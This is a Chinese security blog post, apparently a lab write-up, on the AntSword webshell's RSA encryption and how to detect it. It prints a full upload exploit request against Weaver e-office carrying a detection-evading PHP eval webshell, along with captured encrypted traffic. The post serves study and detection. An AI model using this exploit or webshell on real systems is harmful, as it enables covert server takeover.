中国蚁剑RSA非对称加密的攻与防

共 12870字,需浏览 26分钟

 ·

2022-06-30 16:14



0x00写在前面

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!




0x01中国蚁剑

中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员,流量使用编码、解码器进行混淆可绕过WAF、IDS等检测系统,并且有多款实用插件灵活多样,为安全测试人员带来极大的便利,同时也受到很多人的青睐。

https://github.com/AntSwordProject/antSword



0x02生成RSA木马

在线RSA生成网站

http://web.chacuo.net/netrsakeypair

生成公钥和私钥

AntSword v2.1.0版本开始,新增了PHP RSA编码器,蚁剑内置了一个编码器RSA模块,使用了RSA非对称加密进行传输,新建编码器 -> RSA配置 -> 点击生成公私钥,然后配置公钥、私钥、PHP代码,生成中国蚁剑连接专用webshell

编码器设置

生成的webshell检测是否免杀

D盾检测(可检测)

冰河webshell查杀(免杀)

火绒检测(免杀)



0x03攻击测试

通过泛微e-office漏洞上传webshell

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1Host: 10.211.55.9:8082User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36Accept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Connection: closeAccept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348Content-Length: 1289Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
--e64bdf16c554bbc109cecef6451c26a4Content-Disposition: form-data; name="Filedata"; filename="test.php"Content-Type: image/jpeg
<?php$cmd = @$_POST['ant'];$pk = <<<EOF-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCjjg16ibX4sUv4fkHmijeD5M3G88Tp4ge9PWaYiUtXm23Tq3iEpZtpe6DkWbbLZvufHZWOQjv9sDEg5aCoeJOftRxvJOj+nqPb3oydsxOBzuoaquE6/ZcK4ZwYF4FipaOP0uctEc49uFQnBeneJLnrKx1eW0EArkolkjFKe8Y4DQIDAQAB-----END PUBLIC KEY-----EOF;$cmds = explode("|", $cmd);$pk = openssl_pkey_get_public($pk);$cmd = '';foreach ($cmds as $value) {if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {$cmd .= $de;}}eval($cmd);--e64bdf16c554bbc109cecef6451c26a4--



webshell连接地址

测试方式(编码器RSA+解码器default)

http://10.211.55.9:8082/images/logo/logo-eoffice.php


测试连接成功




配置http代理抓包分析连接流量

代理配置(也可以Wireshark抓包分析)




第一个交互数据包

编码器RSA+解码器default




编码器RSA+解码器base64



编码器RSA+解码器rot13



对请求数据进行url解码、base64解码发现数据为乱码


通过分析编码器,发现传输的数据是通过RSA公钥进行加密,baas64编码进行传输的,从而实现了对流量的免杀。


连接流量分析

1、Base64:

POST /images/logo/logo-eoffice.php HTTP/1.1Host: 10.211.55.9:8082User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194AContent-Length: 2810Accept-Encoding: gzip, deflateConnection: closeContent-Type: application/x-www-form-urlencodedant=YKc6gcTqiGacc%2FQ1PuCLeTUqaFsw2fOatVSzW0S1PsntU45VuBvI5msgplm%2FVJAD1o8bsswCt4UGXIw1epWyDPzFPgkAJilJr8OkwcI%2BWTV5m7n8AIhF0yOOPAocSH5iGI6m4oNt%2FQ7MBqCy1F0oT%2Fr4pBoH5OftueQi8dDLcuQ%3D%7CSupGNjon8my%2BNiArG6zK%2FcGQVH0nYrKqCyIjuWXexSpTNykDJ9kYxryrix1HOym%2FPewhjWj2LnQnwyp33mHGPRUoMb8IsXEQIgeeLOjV08LbkWb3dYzYDen3dMxLrMZz4r4rLsp4uenqc30g4X%2BQo4szxCdD1EveL%2F28FK5YJrY%3D%7CdhXaJmNV0FpVQrVFx6MsN5G%2Bxh9bdaSW5XGp%2FlP4wmB9oqAOFSbB66ONMkJjV6vBUzpLzkVxWu3CaqVwHobgHjCTpnqEtTzJ9PDLwznYDtiZeLwdeobxxJbS52L5kLFV4Q8Cs%2FGVJ3ZkmlZC0n5u0OL6Mz7oj5DpSJOxv76E3tY%3D%7CkmVlk8oig5gTjkdM0xwxLgWmICsSHgy52C4tOIHmQqW%2FJ7Th2k%2FalpjDcEXS5noQU4cGRum1zYYMyqb89feasu9FubYi872JIQWFTV1J90lwmRzesTnO1kbw%2BDDwYTZJFAqJv7oz5gzqCvtWayKwI5xC18DtJmaWGQ2pRB3h2js%3D%7CNHKMyZ5UX6GdF1aLhPgLlsx7cRILuWFgZ8LDzdFBAOjd3gsvlng0YDPYdPEgl6KEXQkOvDkRBq2vrRpDCCt2X7PjFxJxVhZQP%2FpjhEmcEp8lSJYNja6BTSSqRo3Z0TKa78rdeGwEJAAEg%2BLLKJearYOLalLqH12iaw%2BfcnY0XwI%3D%7CdAgPN66G8RP4J7KY935hmeMw12JG9QYNgLdxDwJ3JiMv4orLbq%2B5nOzH6VgXWgnUytZHtpaTf2FFr4KA3oZnSltLurBBvAXxuFiMcSr%2Bqg%2Fd1jDWI4mAsC8Z5Uz8TRBGmm1mcYNwE56u4ezW3Cjkf2nBmJmCkBUAOQQTvIW6zt0%3D%7CRbe5CDwSBZcic9Esr%2FeKg%2BJLii1A%2ByWJMGfaWrrp0%2BnXw4PYAGGT8IQHKzhdMF1GycKYPhKw4kV2szN%2FElP7rlP7gNMGxHhCGUOB%2FJlTwd4c2Z%2FHVfG4F0RLHfKqyIXii8UzRKvzicJVjk4tQV4VUuaaB%2BJqzRsfwJlh8ZxjJA0%3D%7CJ0GD%2F5W1bJCwfqWeJjRP7Crjfi5uwx%2FZh%2Bpq1pcbNtEtoqrc9J4tR27sWfVz9WY0oRVlZkajbUz9F%2B4nMe%2Fa5v%2FVEHYYjNRArOck9jrzQ9N9w%2F7qc%2FLtlR5Z%2BXgRAWw6HRI3SXQz7iI2Tr2yX%2Fc5uI7okY%2BrfwMClpXSuuHTEo8%3D%7CfohHb1C%2FzUJ77%2FIEAwmRISV%2BzsdeAygjtWPfb7XFDG3tfogdhGWxhyIm%2FgxwDbeW8%2B8qmGowryWHiGpSFc%2BdsflpoMVREYgreQAuuOKsccqVF%2B7O5hPj0wslH%2F8RXz99hu4M2RXxDGMKPi1Zjyt2xIeV0%2B0vVujqCoqj8JqaGnI%3D%7CDQBBTstRO9SvIktPWRtQPyD6qNX9Sb%2Fbyw4Err34XmvCo1pbYAqNdYzzngpKyx1ZnrH8fpHkhxEhkUiFiurfpqHiJQ6oVloYf90B%2FddykmZFkw4190%2B2rb0Hbw%2BSrduJEU7hWlKrMDqaG3Z8o8idVtbFXvihW4sM2qrKtXD5i1g%3D%7CMDHjjdGMDiHzsG94H340Z2VsjBceQ8YHaVx1SaslqoLMbTA9hov1EMTlYZm0Muy4jBin4i880UzrVBkxQBG%2F%2BeHP%2BToRLNilJZm6OJYMRdBTdSCR4qovem5W27HHaHUkZx%2BtcrvfKIA32GaFWymX3bGWHLBEe6z8xsFmqAhDjXQ%3D%7CNOGyWuBDmTeOBQmrAIdjUHR%2FfTXfW8eQSegmMwiDuOrNuETjirFOw6%2F1WwSev5CZ8jJKxMdc90o8rCXsqKl65wXzLyZuEcLWDVFb0Sdd06yr9W5D0Cec%2FyuYlxksHE9mzL%2F99uZsaCV4ETMIAHUl1IzoCwDKbNMWS6%2BuG0COlfs%3D%7CMgpQIzjmORFWFlnySqPz9TVXlg6LrZdZbWkdPDVx%2BU7zUzfcx3sAfPc7go90ketoIlFwqCa8xHf34Z7D0nPYV5n3c3GGO5IA0ASa%2Fark%2B9fPNYHQtx1H%2FjHmfrzJxnJY47BYXjkxlxx6qnszI%2FyVVDLgycd8VymeNZCRbsSF7ds%3D%7Cm7u0n8JL6%2BVeztHHYUwBwWCVuCb7V3xumKaLxKZpKqz7udyJxg36ZzCjnGu7hGmFbB2CFhl7LCk%2BCNRTniQM6AP0fXsYOYdQVLivY%2FeLSFN15dfUcjkgZGjMqejtIXdB2ovYqBIH%2FCsl1gjgwWLPX1jgLHwt23XvdZFhCEdqBik%3D%7CZS4P86VmcXviTY5mBBYs4HfEhMLBypZQ%2Fnh9aPkgiDonbEMAshMh%2BhHLVxPQhKvBoodun9SkOSnVKLKdcbR%2BEFdlRkEpEC42SVxQqFKV2fPaRlYDA8%2BeXsH07WE9MLg3laVgHFLI2BUs9r1yLMH6Cqsy79FJvacW%2FBDKX9Ql1uM%3DHTTP/1.1 200 OKDate: Tue, 12 Apr 2022 08:41:37 GMTServer: Apache/2.0.47 (Win32) PHP/5.2.5X-Powered-By: PHP/5.2.5Content-Length: 118Connection: closeContent-Type: text/html; charset=utf-8721d11efQzovZW9mZmljZS93ZWJyb290L2ltYWdlcy9sb2dvCUM6RDoJV2luZG93cyBOVCBZVU5aVUktUEMgNi4xIGJ1aWxkIDc2MDEJU1lTVEVNffc472

2、chr

POST /images/logo/logo-eoffice.php HTTP/1.1Host: 10.211.55.9:8082User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36Content-Length: 2840Accept-Encoding: gzip, deflateConnection: closeContent-Type: application/x-www-form-urlencodedant=YiXyFq%2Fprrg4evrbbiKnLPUMXcUjdDNePMJiFvnkuQsNf%2F2bDDbV%2BglxW6TWK%2F%2F%2F45rsR%2BY%2Fm8iLhcUt0IshzxbHC7bOLa7eKLCcuSOVLtJnAbQhG7oVEc76uBlsdCU5Wu7mPLWBYTHhhRNPwtvdlOIQbdFaxto3o17MWy9L3yw%3D%7Cc4NlNm5agVTJHbfPp%2FW2a3I1hd%2BBudSZyVUQcZAqNHsCIoPUqoxXX5p5AA1doeA2zCtn%2Feg8p3TB4UAPJbzSW%2B7Te2x62oNkRdDh%2FVr6ZlEbAG5pZC%2B0cI8GL48drvdjVECuDj74gEll9BCRW6GFpxnZXFfpMECOO3r6ZllbEnk%3D%7CLW5%2FbREDZoax%2FDbAk7ZJr%2FTPM9kfxuTZI%2F0amfCcwRAsUnuYCZ77xYtZHQTSIfXn3zw85Cr5slp5SQkReurmsAE4pIpc4IaJDQstl3zuT%2B6bH9FJa%2FSaSxMTmrUAg7k59J3z%2BkGzYwcOlp1%2BObtBHkQVZQ9xEuW2yr1QTHD%2FfJ0%3D%7Cnmv4HxDpKTfWcvCqOORZ0ccm%2FhpNNQ7XJGJPMdKx3G2xojU7C%2BKaOEBqVPPMrYJRRdVPWApUj2fSAPEeCQi87TeFm78adpzbtZmrYta7TQYFROF3UFv0hMgBvQw6ONutQntgE0GaCFRVqVC6b6ZqkUJUvHM8B8Zu9FKPzngUwlU%3D%7ChrQwyxH9%2FJx6LFT0VNv0cSd%2Ff2yzVw%2BOJiclxUKcEhV8q%2FM1Tx0Zx%2FNizuGpB%2FmmNBfzeMffSZkMxeWEtEYQK%2F4in1rK4T3RF1nZ06cneuI45rD1959C2mLSjVul0AKaFvZSTW0vL5laM4rYl1BHBhWblgVcbUWi5B6dRnk%2BjCE%3D%7CnevocVhkYRoAcVraHcND49w%2FGgpYxQM4jc1n8J%2FHrEfjNnbJmCKabgsFUb2TGmv5i0n%2FfLzTSQ%2FBo1kBztiWU4pTSBJ3iv2UBhPMG9LEB9xH%2FbkQWIa2ePIr56YWmvfN6fXy1F6lW7T7%2F4FIE%2F4DDb4jgwUncWFA504ogCNLW7E%3D%7Cdl1Wo3bpS5Elt0Q2bonJZmPJAioe3g3s%2Fx%2FfK%2F8UtCXzUhhY3kxKJb9itP%2BbPbrrbUY6lAdl13G0BE%2F2SdtFiD0Kx9b4RN30r6l8jsuJla7uc01LX%2BHjBcojGdIYr23P%2FSzZBHVffNCSljfTJbYlDO5sPJ%2FgmoBtJOLEoP0Hi70%3D%7CBTj0kRvK6GPmDn0uEm%2Fm8F3%2BsxItr1h4hR3zdVa1VF%2B%2FNXUqS3uBETvN9qPLWhGUBZfMdL1j3Vjv7vMqNQBZuxqZ2Z0irD1AWzjQrI5gaZOi0mICY67eJKWeY95udeharJ5tPVaQv9Id1jeLEKk1H2r0acEpUGpCJWtCPX%2BIWBI%3D%7CiwHLtTeNpssZ%2BLjVBEBZuNzpFkPFSRlhhzLu29D7aT%2FHRz%2BBtgT8sZuPTGJnEC6QXo0hhEzHLtZ%2BVnvGqGPGt0pNi3eGBy%2FLdAdXtigPepjtLv0EAETm%2FmJvGfgrPhM0yRAQz9AGky%2BltYhoU4uVPsWBUDR7owEZKotewpiym7k%3D%7CVLoJK05GULezBTpPlin%2FUuWZnZXg%2BFkzCUqB5eAvjiUYb6SMZPUvnI9L1KBQcJnpaT81t5O3GRufjybWYv8Y359IgxluNh6WajnkcFWXZnTAowH%2FOH8Was%2BQ9C3XCOX7kkJQEbWS7ifS%2BZJ76sfnDScEblc5iaD4jLn43isa9vE%3D%7CbPwMmWNCNQbhqma%2FLEtS18P9eLlPU4tOt3BBQb%2FwGriS9Qo%2FvDCgsb6FDkVpr27U807dvKa7ybpReM1%2FWuXVpTIFs6UeV9Tt0U6o8Edr5c5cOyYHY%2BHk0Q6%2FY8hxaWxi8GSXqlLBU3tXk817APkZq55Gdgzvha%2F6xR24K5LUW68%3D%7CTa8OgzCIJ8M39TVsfYIjfCqfgnbJU2eEFCHE1QcxeCCj78khr2hl3971WnDpiFRcvqGrHJJg2nb%2FfWf%2BhGVRuixitEktqdDf612Jg%2BZyYe40TZI%2F4AUpGjX17TNdVAjNRW4U8vL89p3%2BYwcLQyjCUgSsEsiSfOoqJOQOZcRpv4I%3D%7CA8vIoVGO2xL1mrc9GyqXBfrflBO6fsYMoZuyqYQLtdOaLxPbQlcXAPThxjizMdKeKTV0Vz8Ia9x7a6Kdz%2F928YeE6OqyNlord1aCy%2BHKRYlPnn7waenQnhkNke283xdnK5rcH7u5YmAgbcAqttNmI13jNMeTcgDIIvF7hBXsz14%3D%7CHmDv190rZS9yiVLSTLvquni0hNxuGPM%2BjUgko3n4yy2NyrYd38qmD6fXdMwE%2B2sqx9ihwnLSVRF%2FjJ8y%2B2w0JjHpzHwqtNXgAXEppAAKHrFLPvFIU%2BJ8LaqnZu%2FAZKp%2Bucb2KbpNkeOx8bjH5yk0v7qc%2BsKvvvjifHtNaIOd0us%3D%7CMnW67HYNEpuFHTxLbP3pR4AsckEbsGB03bS2fYGndibUuILPvqdsdbuU6rdrKTAZluKY%2BeFstXEgLKPK%2F4rWhPou%2FsyO%2ForB%2BnwbaKRmsSHaIdb6rH6GrmWg5wUzoliKi5iiUb4tk5wyE46MsRGmaAweg1bpCvUWlCF6GKc8ekA%3DHTTP/1.1 200 OKDate: Tue, 12 Apr 2022 08:41:40 GMTServer: Apache/2.0.47 (Win32) PHP/5.2.5X-Powered-By: PHP/5.2.5Content-Length: 91Connection: closeContent-Type: text/html; charset=utf-84629930P:/rbssvpr/jroebbg/vzntrf/ybtb     P:Q:     Jvaqbjf AG LHAMHV-CP 6.1 ohvyq 7601     FLFGRZa9b886


3、default

POST /images/logo/logo-eoffice.php HTTP/1.1Host: 10.211.55.9:8082User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36Content-Length: 2828Accept-Encoding: gzip, deflateConnection: closeContent-Type: application/x-www-form-urlencodedant=YiXyFq%2Fprrg4evrbbiKnLPUMXcUjdDNePMJiFvnkuQsNf%2F2bDDbV%2BglxW6TWK%2F%2F%2F45rsR%2BY%2Fm8iLhcUt0IshzxbHC7bOLa7eKLCcuSOVLtJnAbQhG7oVEc76uBlsdCU5Wu7mPLWBYTHhhRNPwtvdlOIQbdFaxto3o17MWy9L3yw%3D%7Cc4NlNm5agVTJHbfPp%2FW2a3I1hd%2BBudSZyVUQcZAqNHsCIoPUqoxXX5p5AA1doeA2zCtn%2Feg8p3TB4UAPJbzSW%2B7Te2x62oNkRdDh%2FVr6ZlEbAG5pZC%2B0cI8GL48drvdjVECuDj74gEll9BCRW6GFpxnZXFfpMECOO3r6ZllbEnk%3D%7CLW5%2FbREDZoax%2FDbAk7ZJr%2FTPM9kfxuTZI%2F0amfCcwRAsUnuYCZ77xYtZHQTSIfXn3zw85Cr5slp5SQkReurmsAE4pIpc4IaJDQstl3zuT%2B6bH9FJa%2FSaSxMTmrUAg7k59J3z%2BkGzYwcOlp1%2BObtBHkQVZQ9xEuW2yr1QTHD%2FfJ0%3D%7Cbrg6%2BKZM7B3qYLLGppGHJ1q7yCTBr3Z6pGLX0LL87I2pQD%2BzHLt1amHKmgeQ0cEA2Y9Wp3ae11u9%2FFGcxL3YScRGu8r043fdD%2BqbSOivWbbVPbUfVv1rLCtNXyqXudWxlGJ9ACID%2Fa0ibhzyaMv9v11IupPPHXiMlPL6rw7P05k%3D%7CTyo5lbtjtq5GT3KcoNqbuL4b%2Fm4paol7bahEj%2Bas5GzKu%2BQu3M1Vm3TpSnPiTfE9xRtlvPFj8nnNnPJ%2FW1HFuDMxYw4hpcSWSQq%2FyrSEfAG1oMHDHsOj5VZE6OkHnkR%2BJv9MBDHBCrPPfLkMODATBPT2gN%2BMVNgiyIkQWmHeaSI%3D%7CekPxfn%2FJQweaqz9RdL2Xx7AyBznz3eNqY2KWCnFX3fuR2McHrvrtl2MVXgKogqQrhfFa96Ee%2B1EaJYwzk%2FcxUV0%2FzUE5YWbQFZQuH3znmR0Jd33aVZrvhDMtD23xsLw6BhaMOtQ8k8Ieoi5lt7GjDIiAAThFsSXnSXL%2Fydy15YI%3D%7Ci6C2yHJJ%2BENE%2BYAb%2F1DarE4I3Vvnz2MvVeI%2B4PH6xNKEkGNWL1dxuit7OBprlU4zF7H4r4TMTGP9dsl6eSEOL14W%2Fh888UKTVQb6h5wafxkekR6SNqMvWGdQ010UNgqZ%2BD4h5zJgFEsJc293y8ORS%2FNUpcOzqWuL2DE91SbvhPI%3D%7CAJNFE62mMKRdrNqeZQwIzsrKmnZir%2FC3nh2LF4zHhpLml%2BrEROR6pxq8VoxEyOJ4HqBokufQaXcTbliLpqdKBLXawRMoFLxB%2FcUEgnPH6QnTcGp2o4dIQyNzkC6imdYaKsTGHMMMzpcbnk1Mm2bmJu%2FH9KdAJ2RFHoWqwQm1Ox8%3D%7CRWtP1JCbFMwbB7AJkUoSoostVOcASOo65xFis3HlwhJEWPgeRFMZ7J%2Fxlalobf26%2BGn3KqG69Wou%2BkMEyULuE6UqWzVBCTvU7ZNxybEApDKkD4AJRukbdhm47MpdiGblkHrqZUvMP4Q6XrJ78a93F1qZpzulGbEBKEC2dvaudEs%3D%7Cj%2FOjvw1xVxaA4jBBbpKI%2FW1TqccJnkSa3KunBHn3Kr8lYMGS8bUSlN1HryluZQcdjn6%2B44JKhYmTqXsgmyxGCjAehNgZ1RhPDJSAx9%2FJrMbxTmXWNQjMiYIgISIHIMmwrgc4HflRmzx3XG3ArVCJbKPb1EbgJ6kFVRJKSrmvYuw%3D%7CUV%2BfJc43%2FEH02EQDYkQ%2BU8rx6CKtkkQcKLJufm%2B7zKxUjuwEeYI9pKCDXfxQCw3pgakeH3qxBMLA5iJBtp1kQgMXwqrjRxOmq37vqdEXE7NRbDXzSReD4I9Rn860ACvhqEuIHmxSuTR7QlDcmd%2Bhu2Q5jR0yMIlwEEkyIkAIef0%3D%7CeDVGOZ%2FbXT7Yt0bddjGpbAW6WCwd3f0szgeT0zLQH%2BGaRpTaHR1qzgKlJ1HdQAWLZKlTkeghqtgvTSWJdmPZXkCLVnuf3pDcWlkNWLAiIAWJGcjRu5WyZyyDQBUQuI%2FHinSIs01P2RygKyGxMdG6QfKCgEZzjw7e3f%2FkMR%2Bu4YQ%3D%7CZDF%2FGyXt35XIuWB9U9U6aIzYU3g2yIsmmAlHeWF8E5yjwKCE5Zt7fpzoh1ouDK%2B21lRIVz9QFjQHTq8EZw%2FVfLiONMC9Jq1Ju%2FTH%2F1Suwlyf%2Bwa914vs1Z0r%2Bh8udvkU%2FkweuaVoNGmp30VlU%2FW9XC%2B93DN%2F67FE%2BidxUXA5O%2B4%3D%7Cg4f7XkR0Mf8PqCpKoVekbCAKw582AiYfHhpLGo3XASJ9SEMzub5FuOrw7cd7UVUXXQHqkayiHyUh2kq%2BV7WiLtei9Sq92fp9xVWN32J8voiGsfEnBm1lPcwZbmFSa0vhzdrVmxphOarJg2wFrpYlcpY58GmlFNCwCnam52J1q9Q%3D%7CH8oR66x2cJmVBtkyuAYeFyrsqPcSSRSXCymHKK2Tbt%2FquUXV1uFmewppEt%2Fw2UDb7ARQNXXOEhCAYAyzlZaYSvWBUwejUoLIR5wzwjAzVZpIxe8xZQSfnrEjNd7aM6Fp%2FYJgwa7wSpcKeIQ%2BkUslFpEv53StQycn6hV9pJl4WXc%3DHTTP/1.1 200 OKDate: Tue, 12 Apr 2022 08:41:34 GMTServer: Apache/2.0.47 (Win32) PHP/5.2.5X-Powered-By: PHP/5.2.5Content-Length: 92Connection: closeContent-Type: text/html; charset=utf-8a96ed3a93C:/eoffice/webroot/images/logo     C:D:     Windows NT YUNZUI-PC 6.1 build 7601     SYSTEM690a7








0x04检测建议

中国蚁剑工具从设计和使用角度加入了很多攻防对抗的思考。以下为三点检测建议:

第一,从从攻击入口检测RSA木马的上传,可以使用静态检测规则或者沙箱或webshell查杀引擎进行。(流量、行为等)

第二,检测中国蚁剑工具在流量测的强特征,具体可以从上述分析中研究提取。

第三,通过威胁狩猎进行全方位监控,发现异常进行全流量回溯,从而定位攻击。



往期精彩文章




QQ疑似遭遇大规模盗号,你还记得你的QQ密码吗?
记一次SRC信息泄漏利用
confluence-CVE-2022-26134漏洞分析
CVE-2022-27925 Zimbra Collaboration 存在路径穿越漏洞最终导致RCE
团队招人进行时!期待优秀的你加入


技术支持:白帽子社区团队
— 扫码关注我们 



浏览 35
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报
评论
图片
表情
推荐
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报